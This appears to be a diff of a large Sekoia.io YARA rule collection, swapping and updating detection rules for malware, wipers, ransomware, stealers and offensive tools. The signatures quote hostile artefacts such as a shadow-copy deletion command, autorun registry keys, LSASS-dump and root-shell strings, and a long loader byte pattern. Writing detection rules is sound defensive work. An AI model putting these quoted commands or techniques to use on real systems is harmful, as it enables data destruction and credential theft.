-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "c029693f555726d28375717fe459ccf4521d2d63fc7053032bbafd60129848f0"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_badmagic_commonmagic_usbstealer.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a600f17bce9159b581c234cc101d1a0d093954fc9c79052dbca5451714fd7502"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "5ee5b869689686d9352c73173304627bb424b8d0a8510e6f16726ac84fdec79d"
-		hash2 = "0f76768f65775329d7a0ddb977ea822d992d086ce48a23679cef66e3b4d2f4ed"
-		hash3 = "f06c7f1b91fb2f64e1f38df6eaf2b52a74b16cc958d74c4401fdaf180deb595a"
-		hash4 = "cbed0cf3273ce544a7e4e316d5c8f5e9c9ac6deaefa485a6afad2654fe75ff1e"
 
 	strings:
-		$a = {cc cc cc 48 89 4c 24 ?? 53 55 56 57 41 54 41 55 41 56 41 57 ?? ?? ?? ?? 33 f6 44 8b ee 48 89 74 24 ?? 8b ee 48 89 b4 24 ?? ?? ?? ?? 44 8b f6 48 89 74 24 ?? 44 8b e6 e8 bf ff ff ff 4c 8b f8 8d 5e ?? b8 ?? ?? ?? ?? 66 41 39 07 75 1b 49 63 57 ?? 48 8d 4a ?? 48 81 f9 ?? ?? ?? ?? 77 0a 42 81 3c 3a ?? ?? ?? ?? 74 05 4c 2b fb eb d5 65 48 8b 04 25 ?? ?? ?? ?? bf ?? ?? ?? ?? 4c 89 bc 24 ?? ?? ?? ?? 48 8b 48 ?? 4c 8b 59 ?? 4c 89 9c 24 ?? ?? ?? ?? 4d 85 db 0f 84 d5 01 00 00 41 b9 ff ff 00 00 49 8b 53 ?? 48 8b c6 45 0f b7 43 ?? 0f b6 0a c1 c8 ?? 80 f9 ?? 72 04 48 83 c0 ?? 48 03 c1 48 03 d3 66 45 03 c1 75 e5 3d ?? ?? ?? ?? 0f 85 d2 00 00 00 49 8b 53 ?? 41 bb ff ff 00 00 48 63 42 ?? 8b b4 10 ?? ?? ?? ?? 44 8b 54 16 ?? 8b 5c 16 ?? 4c 03 d2 48 03 da 45 33 c9 45 8d 79 ?? 45 8b 02 41 8b c9 4c 03 c2 41 8a 00 4d 03 c7 c1 c9 ?? 0f be c0 03 c8 41 8a 00 84 c0 75 ee 81 f9 ?? ?? ?? ?? 74 10 81 f9 ?? ?? ?? ?? 74 08 81 f9 ?? ?? ?? ?? 75 44 44 8b 4c 16 ?? 44 0f b7 03 4c 03 ca 81 f9 ?? ?? ?? ?? 75 09 47 8b 2c 81 4c 03 ea eb 20 81 f9 ?? ?? ?? ?? 75 09 43 8b 2c 81 48 03 ea eb 0f 81 f9 ?? ?? ?? ?? 75 07 47 8b 34 81 4c 03 f2 66 41 03 fb 45 33 c9 49 83 c2 ?? 48 83 c3 ?? 66 85 ff 0f 85 75 ff ff ff 4c 8b 9c 24 ?? ?? ?? ?? 33 f6 48 89 ac 24 ?? ?? ?? ?? 4c 89 6c 24 ?? e9 8d 00 00 00 3d ?? ?? ?? ?? 0f 85 90 00 00 00 4d 8b 43 ?? 41 bf ?? ?? ?? ?? 41 0f b7 ff bd ff ff 00 00 49 63 40 ?? 42 8b 9c 00 ?? ?? ?? ?? 46 8b 4c 03 ?? 46 8b 54 03 ?? 4d 03 c8 4d 03 d0 41 8b 11 8b ce 49 03 d0 8a 02 49 03 d7 c1 c9 ?? 0f be c0 03 c8 8a 02 84 c0 75 ef 81 f9 ?? ?? ?? ?? 75 16 42 8b 4c 03 ?? 41 0f b7 12 49 03 c8 44 8b 24 91 4d 03 e0 66 03 fd 49 83 c1 ?? 49 83 c2 ?? 66 85 ff 75 ba 48 8b ac 24 ?? ?? ?? ?? 4c 89 64 24 ?? 41 b9 ff ff 00 00 bf ?? ?? ?? ?? 49 8b df 4d 85 ed 74 0f 48 85 ed 74 0a 4d 85 f6 74 05 4d 85 e4 75 14 4d 8b 1b 4c 89 9c 24 ?? ?? ?? ?? 4d 85 db 0f 85 39 fe ff ff 4c 8b bc 24 ?? ?? ?? ?? 49 63 6f ?? 33 c9 49 03 ef 89 b4 24 ?? ?? ?? ?? 41 b8 00 ?? ?? ?? 48 89 6c 24 ?? 4c 8b e6 44 8d 49 ?? 8b 55 ?? 41 ff d6 44 0f b7 45 ?? 48 8b f8 44 0f b7 55 ?? 49 83 c0 ?? 4d 85 d2 74 4f 4c 03 c5 41 8b 00 4c 2b d3 45 8b 48 ?? 41 8b 48 ?? 48 03 cf 49 8d 14 07 41 03 c1 89 84 24 ?? ?? ?? ?? 48 8b c1 48 2b c2 4d 85 e4 49 0f 45 c4 4c 8b e0 4d 85 c9 74 0f 8a 02 48 03 d3 88 01 48 03 cb 4c 2b cb 75 f1 49 83 c0 ?? 4d 85 d2 75 b4 8b 85 ?? ?? ?? ?? 41 be ?? ?? ?? ?? 85 c0 0f 84 e8 00 00 00 48 8d 1c 07 8b 43 ?? 85 c0 0f 84 d9 00 00 00 48 8b ac 24 ?? ?? ?? ?? 8b c8 48 03 cf 41 ff d5 44 8b 7b ?? 33 c9 8b 33 4c 03 ff 48 03 f7 4c 8b e8 49 39 0f 74 7d 48 85 f6 74 31 48 39 0e 7d 2c 49 63 45 ?? 0f b7 16 42 8b 8c 28 ?? ?? ?? ?? 42 8b 44 29 ?? 42 8b 4c 29 ?? 48 2b d0 49 03 cd 8b 04 91 49 03 c5 49 89 07 33 c9 eb 2a 4d 8b 37 49 8b cd 49 83 c6 ?? 4c 03 f7 49 8b d6 ff d5 33 c9 49 89 07 41 38 0e 74 0e 8d 41 ?? 41 88 0e 4c 03 f0 41 38 0e 75 f5 49 83 c7 ?? 48 8d 46 ?? 48 85 f6 48 0f 44 c6 48 8b f0 49 39 0f 75 89 41 be ?? ?? ?? ?? 8b 43 ?? 48 03 c7 33 f6 eb 06 40 88 30 49 03 c6 40 38 30 75 f5 8b 43 ?? 48 83 c3 ?? 4c 8b 6c 24 ?? 85 c0 0f 85 3c ff ff ff 48 8b 6c 24 ?? 4c 8b bc 24 ?? ?? ?? ?? 4c 8b cf 4c 2b 4d ?? 39 b5 ?? ?? ?? ?? 0f 84 b5 00 00 00 8b 95 ?? ?? ?? ?? 48 03 d7 8b 42 ?? 85 c0 0f 84 a1 00 00 00 41 bf ?? ?? ?? ?? bb ff ?? ?? ?? 45 8d 6f ?? 44 8b 02 4c 8d 5a ?? 44 8b d0 4c 03 c7 49 83 ea ?? 49 d1 ea 74 62 41 be ?? ?? ?? ?? 41 0f b7 0b 4d 2b d6 0f b7 c1 66 c1 e8 ?? 66 83 f8 ?? 75 09 48 23 cb 4e 01 0c 01 eb 34 66 41 3b c5 75 09 48 23 cb 46 01 0c 01 eb 25 66 41 3b c6 75 11 48 23 cb 49 8b c1 48 c1 e8 ?? 66 42 01 04 01 eb 0e 66 41 3b c7 75 08 48 23 cb 66 46 01 0c 01 4d 03 df 4d 85 d2 75 a7 8b 42 ?? 48 03 d0 8b 42 ?? 85 c0 0f 85 7a ff ff ff 4c 8b bc 24 ?? ?? ?? ?? 44 8d 70 ?? 8b 5d ?? 45 33 c0 33 d2 48 83 c9 ff 48 03 df ff 54 24 ?? e8 21 fb ff ff 4d 85 e4 74 13 48 85 c0 74 0e 4a 8d 0c 20 4c 8b e6 e8 67 00 00 00 eb 3b 8b 94 24 ?? ?? ?? ?? c1 ea ?? 89 b4 24 ?? ?? ?? ?? eb 1d 48 63 84 24 ?? ?? ?? ?? 41 89 34 87 8b 84 24 ?? ?? ?? ?? 41 03 c6 89 84 24 ?? ?? ?? ?? 8b 84 24 ?? ?? ?? ?? 3b c2 72 d8 4c 8b 84 24 ?? ?? ?? ?? ba ?? ?? ?? ?? 48 8b cf ff d3 49 8d 04 3c ?? ?? ?? ?? 41 5f 41 5e 41 5d 41 5c 5f 5e 5d 5b c3}
+		$ = "\\\\.\\pipe\\PipeDtMd" ascii wide fullword
+		$ = "State USB" ascii wide
+		$ = "DefaultNameDevice" ascii wide
+		$ = "SerialNumber" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $a or pe.imphash ( ) == "37af5cd8fc35f39f0815827f7b80b304" or hash.md5 ( pe.rich_signature.clear_data ) == "b857cf76a54ce175c225eaaae66547a2"
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
 }
-rule SEKOIA_Tool_Sharphoundpowershell_Strings : FILE
+rule SEKOIA_Tool_Cheat_Engine : FILE
 {
 	meta:
-		description = "Detects SharpHound Powershell"
+		description = "Detects Cheat Engine driver"
 		author = "Sekoia.io"
-		id = "f27a0bdc-1a8c-43f9-843c-6c8506726f37"
-		date = "2022-08-11"
+		id = "51d4246c-f7a1-4589-8f97-bd85d1fe4a0e"
+		date = "2024-07-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_sharphoundpowershell_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "29756acb0afd8aabac170ca8288f1dcffcb2e601c9bdba1cc7a30b8b415661f6"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_cheat_engine.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "2a70016be13c4eff7f7381fd0e34c345c95f09d4cd8b754ea68d59adfe3fe4b6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -226857,28 +227336,31 @@ rule SEKOIA_Tool_Sharphoundpowershell_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "function Invoke-BloodHound"
-		$ = "$vars.Add($RealDNSName)"
-		$ = "$vars.Add($Jitter)"
-		$ = "CmdletBinding(PositionalBinding = $false)"
-		$ = ").Invoke($Null, @(,$passed))"
-		$ = "$EncodedCompressedFile ="
+		$s1 = "ObOpenObjectByName" wide
+		$s2 = "PsGetProcessImageFileName" wide
+		$s3 = "PsRemoveCreateThreadNotifyRoutine" wide
+		$s4 = "PsSuspendProcess" wide
+		$s5 = "PsResumeProcess" wide
+		$s6 = "\\device\\physicalmemory" wide
+		$log = "%sCPU%d.trace" wide
+		$ioctl_code = {04 E1 22 00}
 
 	condition:
-		filesize < 2MB and 4 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 200KB and all of them
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_4 : FILE
+
+rule SEKOIA_Wiper_Win_Nominatus_Toxicbattery : FILE
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "Detect the Nominatus_ToxicBattery malware"
 		author = "Sekoia.io"
-		id = "b8327436-3f3d-441c-86b7-35cd30144dc2"
-		date = "2023-02-03"
+		id = "0262378f-f509-4ea4-a3eb-cd0183c4361d"
+		date = "2022-11-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/generic_sharpshooter_payload_4.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "ee67eb7b51ff6f3882c6b3ad86c3581396ba02f616c29a0190d0a2ad3d2ea614"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/wiper_win_nominatus_toxicbattery.yar#L4-L42"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "c226a4c3bcc451482eb782c1cb84f3e956be1e214368d1b315076078d3148955"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -226886,37 +227368,48 @@ rule SEKOIA_Generic_Sharpshooter_Payload_4 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Function RC4(byteMessage, strKey)"
-		$ = "Set EL = DM.createElement("
-		$ = "decodeBase64 = EL.NodeTypedValue"
-		$ = "Execute plain"
+		$ = "DISK"
+		$ = "FileNaME"
+		$ = "FILNAME"
+		$ = "runCommand"
+		$ = "HAHAH"
+		$ = "Damage"
+		$ = "fastInfector"
+		$ = "d:\\again\\SharpDevelop Projects\\RInjector\\Virus.win32RozbehStrike\\obj\\Debug\\Nominatus_ToxicBattery.pdb"
+		$ = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
+		$ = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" wide
+		$ = "\\Antivirus.bat" wide
+		$ = "\\Antivirus3.vbs" wide
+		$ = "vssadmin Delete Shadows /all /quiet" wide
 
 	condition:
-		all of them and filesize < 2MB
+		uint16( 0 ) == 0x5A4D and 10 of them or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "e7f35c173c34b7080d437a90ec90a982" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "2e25c5d3baba182f008a5a15c6f06403" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "70b1c002e4c0c9782c7ce1ef4a13c58ec1da54a26fd06dd7821a71f29431da82" )
 }
-rule SEKOIA_Malware_Win_Lyceum_Maldoc_Macro_20220613
+rule SEKOIA_Ransomware_Win_Voidcrypt : FILE
 {
 	meta:
-		description = "Detect the macro contained in Lyceum maldoc to deploy its malware"
+		description = "Detect the Limbozar / VoidCrypt ransomware"
 		author = "Sekoia.io"
-		id = "3046bffd-261f-4d5b-9015-f2e5fc31c9c9"
-		date = "2022-06-13"
+		id = "394033cc-20fe-4ced-8d77-5f1061bb8c96"
+		date = "2021-10-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/malware_win_lyceum_maldoc_macro_20220613.yar#L1-L15"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a9f4957e8198b4cb2229913a405b3e0fc97cbd3598bb583dbfdaf56ca278d4cb"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/ransomware_win_voidcrypt.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "7e28bae5830df779bf2367482fb966f5cab691a6c8c474950f7442d8fec054a0"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "ActiveDocument.InlineShapes(i).PictureFormat.Brightness = 0.5" ascii
+		$s1 = "C:\\ProgramData\\pkey.txt" ascii
+		$s2 = "C:\\ProgramData\\IDk.txt" ascii
+		$s3 = "fuckyoufuckyoufuckyoufuckyou" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
 rule SEKOIA_Infostealer_Win_Spacestealer : FILE
 {
@@ -226927,8 +227420,8 @@ rule SEKOIA_Infostealer_Win_Spacestealer : FILE
 		date = "2022-11-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_spacestealer.yar#L1-L31"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_spacestealer.yar#L1-L31"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
 		logic_hash = "94edfd0606816ff01d1345357a852cab4321d8881921e51ba96d8d2d4cb893b5"
 		score = 75
 		quality = 80
@@ -226958,107 +227451,81 @@ rule SEKOIA_Infostealer_Win_Spacestealer : FILE
 	condition:
 		uint16( 0 ) == 0x5A4D and filesize > 10MB and 13 of them
 }
-rule SEKOIA_Apt_Unc4990_Emptyspace_Pyc : FILE
+rule SEKOIA_Apt_Ta428_Tmanger_Strings : FILE
 {
 	meta:
-		description = "Detects Python Bytecode of EmptySpace"
+		description = "Detects Tmanger malware"
 		author = "Sekoia.io"
-		id = "d970fd9c-1ce5-471c-96a1-146250f36b89"
-		date = "2024-02-01"
+		id = "f600404d-3f93-4e3f-bba7-9f519f67c6cb"
+		date = "2022-09-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_unc4990_emptyspace_pyc.yar#L1-L43"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "98e9c848f6b6276815b040681d7f36548b367257bb75d133309e89e8572a50b7"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_ta428_tmanger_strings.yar#L1-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "e045f38367fa7f3cdcc908e60de4386889c7878c95b1a40f63fd70683699b0f1"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "PYBOOTSTRAP"
-		$ = "http://google.com/generate_204"
-		$ = "from"
-		$ = "pathZ"
-		$ = "usernamez"
-		$ = "timeZ"
-		$ = "win32api"
-		$ = "base64Z"
-		$ = "json"
-		$ = "marshalZ"
-		$ = "BOOTSTRAP_VERSION"
-		$ = "getZ"
-		$ = "sleepZ    b64encode"
-		$ = "dumps"
-		$ = "executableZ"
-		$ = "GetUserNameExZ"
-		$ = "NameSamCompatible"
-		$ = "encode"
-		$ = "decodeZ"
-		$ = "request_dataZ"
-		$ = "server"
-		$ = "post"
-		$ = "raise_for_status"
-		$ = "exec"
-		$ = "loadsZ    b64decode"
-		$ = "text"
-		$ = "globals"
-		$ = "bootstrap.py"
-		$ = "<module>"
+		$ = "sock_hmutex" wide ascii
+		$ = "cmd_hmutex" wide ascii
+		$ = "%s_%d.bmp" wide ascii
+		$ = "WSAStartup Error!" wide ascii
+		$ = "4551-8f84-08e738aec" wide ascii
+		$ = "Init failed!" wide ascii
+		$ = "GetLanIP error!" wide ascii
+		$ = "chcp & exit" wide ascii
+		$ = "GetHostname error!" wide ascii
+		$ = "[Num Lock]" wide ascii
 
 	condition:
-		uint32be( 0 ) == 0x420d0d0a and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 200KB and 4 of them
 }
-rule SEKOIA_Malware_Swordldr : FILE
+rule SEKOIA_Downloader_Kimsuky_Lnk
 {
 	meta:
-		description = "Detects Swordldr. Maybe chunk_1 is too restrictive"
+		description = "Detect Kimsuky LNK"
 		author = "Sekoia.io"
-		id = "4068c007-50f4-4913-a352-4a40dd4e452b"
-		date = "2024-09-25"
+		id = "3831d115-7874-4bc9-aeb4-d2cb9bc2b5c9"
+		date = "2024-07-16"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/malware_swordldr.yar#L1-L29"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "d0cc758082e303275cbb8cd6b2048eff"
-		hash = "7aa57da44718cd88f7d37b33a5d3ad74"
-		logic_hash = "9e408181b9122925c0ff9efdaed688e659596b58b9108c0f280d9bc1624d73cb"
+		reference = "https://blogs.jpcert.or.jp/en/2024/07/attack-activities-by-kimsuky-targeting-japanese-organizations.html"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/downloader_kimsuky_lnk.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "3512c8c21203a015b316c2a993db1a8c10420df06ea97d84a6e350550a628230"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "3065b8e4bb91b4229d1cea671e8959da8be2e7482067e1dd03519c882738045e"
+		hash2 = "d912f49d24792aa7197509f76e2097ac3858cde23199e1b40f2516948d39c589"
+		hash3 = "e936445935c4a636614f7113e4121695a5f3e4a6c137b7cdcceb6f629aa957c4"
+		hash4 = "fe156159a26f8b7c140db61dd8b136e1c8103a800748fe9b70a3a3fdf179d3c3"
 
 	strings:
-		$ = { CC CC CC CC B0 01 C3 CC CC CC CC }
-		$ = { CC CC CC CC B0 02 C3 CC CC CC CC }
-		$ = { CC CC CC CC B0 03 C3 CC CC CC CC }
-		$ = { CC CC CC CC B0 04 C3 CC CC CC CC }
-		$ = { CC CC CC CC B0 05 C3 CC CC CC CC }
-		$ = { CC CC CC CC B0 06 C3 CC CC CC CC }
-		$ = { CC CC CC CC B0 07 C3 CC CC CC CC }
-		$ = { CC CC CC CC B0 08 C3 CC CC CC CC }
-		$ = { CC CC CC CC B0 09 C3 CC CC CC CC }
-		$chunk_1 = {
-        48 63 44 24 40 44 8B 44 86 04 48 63 44 24 40 45 23 ?? 45 03 C0 8B 54 86 04 48 63 44 24 40 41 2B D0 41 03 ?? 89 54 86 04
-        }
+		$ = "AType: Text Document" wide
+		$ = "Size: 5.23 KB" wide
+		$ = "Date modified: 01/02/2020 11:23" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 4 of them and #chunk_1 > 5
+		all of them
 }
-rule SEKOIA_Tool_Safetykatz : FILE
+rule SEKOIA_Exploit_Linux_Eop_Dirtypipe_Strings : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detects DirtyPipe Local Privesc exploit"
 		author = "Sekoia.io"
-		id = "90f93244-38a7-4574-87c6-15d494e9173b"
-		date = "2023-06-23"
+		id = "712d8a01-576e-4f43-a930-63dcdc535d93"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_safetykatz.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f443dd5be1e15f8385427d965f8c8476c5f1b57b7c9ab53d9e13eb47735e09d3"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/exploit_linux_eop_dirtypipe_strings.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "0abb8de541acea57ced20f66c0aad7b010fea647996039809d36e94555dee204"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -227066,26 +227533,26 @@ rule SEKOIA_Tool_Safetykatz : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "SafetyKatz" ascii fullword
-		$s2 = "get_mimikatz" ascii fullword
-		$s3 = "$8347e81b-89fc-42a9-b22c-f59a6a572dec" ascii fullword
+		$ = "[+] hijacking suid binary.."
+		$ = "[+] dropping suid shell.."
+		$ = "[+] restoring suid binary.."
+		$ = "[+] popping root shell.."
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and all of them
+		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
 }
-rule SEKOIA_Tool_Lsass_Dump_Strings : FILE
+rule SEKOIA_Generic_Sharpshooter_Payload_9 : FILE
 {
 	meta:
-		description = "Detects Lsass dump based on strings"
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "bf024dc6-a1c8-4c3f-9bf8-8d246c129639"
-		date = "2024-09-09"
+		id = "e4283d6e-d829-4f21-ba60-9e6232519e54"
+		date = "2023-02-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_lsass_dump_strings.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "f4540f42902c068b9290239729c45324"
-		logic_hash = "7dfee9368297b3fd6c7f247a65b5344da0f5438c2145c5d53af48983d0d9a745"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/generic_sharpshooter_payload_9.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "deb0773e6300ed0f4c099359731812216390017eaf8de678b2a5ed237906f03f"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -227093,25 +227560,25 @@ rule SEKOIA_Tool_Lsass_Dump_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[SUCCESS] Successfully dumped core LSASS information for PID:"
-		$ = "[SUCCESS] All data dumped to "
-		$ = "[ERROR] Unable to dump process"
+		$ = "shell.Environment(\"Process\").Item(\"COMPLUS_Version\")"
+		$ = "(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)"
+		$ = "DebugPrint Err.Description"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 3 of them
+		all of them and filesize < 2MB
 }
-rule SEKOIA_Apt_Sandworm_Awfulshred_Obfuscation_Apr2022 : FILE
+rule SEKOIA_Pe_Stealer_Axilestealer_Strings : FILE
 {
 	meta:
-		description = "Detects the AWFULSHRED wiper used by Sandworm"
+		description = "AxileStealer strings"
 		author = "Sekoia.io"
-		id = "52317e6b-7f2c-4c2a-bcfc-ebb4ab4c728e"
-		date = "2022-04-12"
+		id = "412bfc3e-6bb7-4b0d-8bb3-96eae0cc9782"
+		date = "2023-12-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_sandworm_awfulshred_obfuscation_apr2022.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "3e1eed3a4b638893828289f928a75b855bc9e1e29444ffa81c0461fdc1277cad"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/pe_stealer_axilestealer_strings.yar#L1-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "829b80c07ed4d9439d66956dbb106aa0cc9961dd2e5c05ffbe6c67e516613590"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -227119,81 +227586,159 @@ rule SEKOIA_Apt_Sandworm_Awfulshred_Obfuscation_Apr2022 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$h = "#!/bin/bash"
-		$s = { 64 65 63 6c 61 72 65 20 2d 72 20 [8] 3d }
+		$s1 = "http://ip-api.com/line/?fields=query,country,countryCode,city,regionName,zip,isp" wide
+		$s2 = "Axile.su" wide
+		$s3 = "Unknown Tokens.txt" wide
+		$a1 = "[ <b>General</b> ]" wide
+		$a2 = "[ <b>Browsers</b> ]" wide
+		$a3 = "[ <b>Wallets</b> ]" wide
+		$a4 = "[ <b>Messengers</b> ]" wide
+		$a5 = "[ <b>Applications</b> ]" wide
+		$a6 = "[ <b>Games</b> ]" wide
+		$a7 = "[ <b>Mails</b> ]" wide
+		$a8 = "[ <b>VPNs</b> ]" wide
+		$a9 = "[ <b>FTPs</b> ]" wide
 
 	condition:
-		$h at 0 and #s > 15
+		uint16be( 0 ) == 0x4d5a and filesize > 50KB and filesize < 200KB and 2 of ( $s* ) and 7 of ( $a* )
 }
-rule SEKOIA_Tool_Sharpsecdump : FILE
+rule SEKOIA_Tool_Quarkspwdump : FILE
 {
 	meta:
 		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "359bf48b-81c8-4d12-ac02-777d4865411a"
+		id = "859823f9-6d47-4b0f-844b-d3af7bad498b"
 		date = "2023-06-23"
 		modified = "2024-12-19"
